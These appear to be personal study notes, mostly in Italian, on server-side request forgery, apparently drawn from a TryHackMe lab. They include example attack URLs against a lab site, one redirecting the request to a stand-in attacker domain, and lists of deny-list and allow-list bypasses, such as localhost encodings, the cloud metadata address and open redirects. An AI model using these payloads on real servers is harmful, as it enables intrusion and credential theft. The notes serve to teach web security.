Explaination

L'SSRF è una vulnerabilità che permette all'attaccante di eseguire una richiesta HTTP addizionale, o di modficarla.

Due tipi di SSRF:

• SSRF normale = questo attacco mostra una risposta a video dell'attaccante 

• Blind SSRF = questo attacco non manda nessuna risposta a video 

"&x=" è un payload che si usa per far terminare la path dell'url.

E' possibile scoprire vulnerabilità SSRF in una web app in diversi modi:

• Quando un full url è usato come paramentro nella barra url: 

• Un valore nascosto in un form: 

<form method="post" action="/form">

<input type="hidden" name="server" value="http://server.website.thm/store"> 


<div>Your name:</div> 
    
etc... 
    
etc.. 


</form>

• Un url parziale inserito come hostname: 

• Solo la path di un url: 

Esempio 1:

COSA SI ASPETTA IL SITO:

http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123

COSA SCRIVE L'HACKER:

http://website.thm/stock?url=http://api.website.thm/api/user

Esempio 2:

COSA SI ASPETTA IL SITO:

http://website.thm/stock?url=/item?id=123

COSA SCRIVE L'HACKER:

http://website.thm/stock?url=/../user

Esempio 3:

COSA SI ASPETTA IL SITO:

http://website.thm/stock?server=api&id=123

COSA SCRIVE L'HACKER:

http://website.thm/stock?server=api.website.thm/api/user&x=&id=123

Esempio 4:

COSA SI ASPETTA IL SITO:

http://website.thm/stock?url=http://api.website.thm/api/stock/item?id=123

COSA SCRIVE L'HACKER:

http://website.thm/stock?url=http://hacker-domain.thm/

If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.

COME BYPASSARE I CONTROLLI SU SSRF DELLA WEB APP:

Deny List

A Deny List is where all requests are accepted apart from resources specified in a list or matching a particular pattern. A Web Application may employ a deny list to protect sensitive endpoints, IP addresses or domains from being accessed by the public while still allowing access to other locations. A specific endpoint to restrict access is the localhost, which may contain server performance data or further sensitive information, so domain names such as localhost and 127.0.0.1 would appear on a deny list. Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.

Also, in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address 169.254.169.254.

x/../private = modo per bypassare la deny list. Il sito ci diceva che l'url dell'immagine non poteva iniziare con private, allora abbiamo usato questo payload "x/../" per bypassare il check

Allow List

An allow list is where all requests get denied unless they appear on a list or match a particular pattern, such as a rule that an URL used in a parameter must begin with https://website.thm. An attacker could quickly circumvent this rule by creating a subdomain on an attacker's domain name, such as https://website.thm.attackers-domain.thm. The application logic would now allow this input and let an attacker control the internal HTTP request.

Open Redirect

If the above bypasses do not work, there is one more trick up the attacker's sleeve, the open redirect. An open redirect is an endpoint on the server where the website visitor gets automatically redirected to another website address. Take, for example, the link https://website.thm/link?url=https://tryhackme.com. This endpoint was created to record the number of times visitors have clicked on this link for advertising/marketing purposes. But imagine there was a potential SSRF vulnerability with stringent rules which only allowed URLs beginning with https://website.thm/. An attacker could utilise the above feature to redirect the internal HTTP request to a domain of the attacker's choice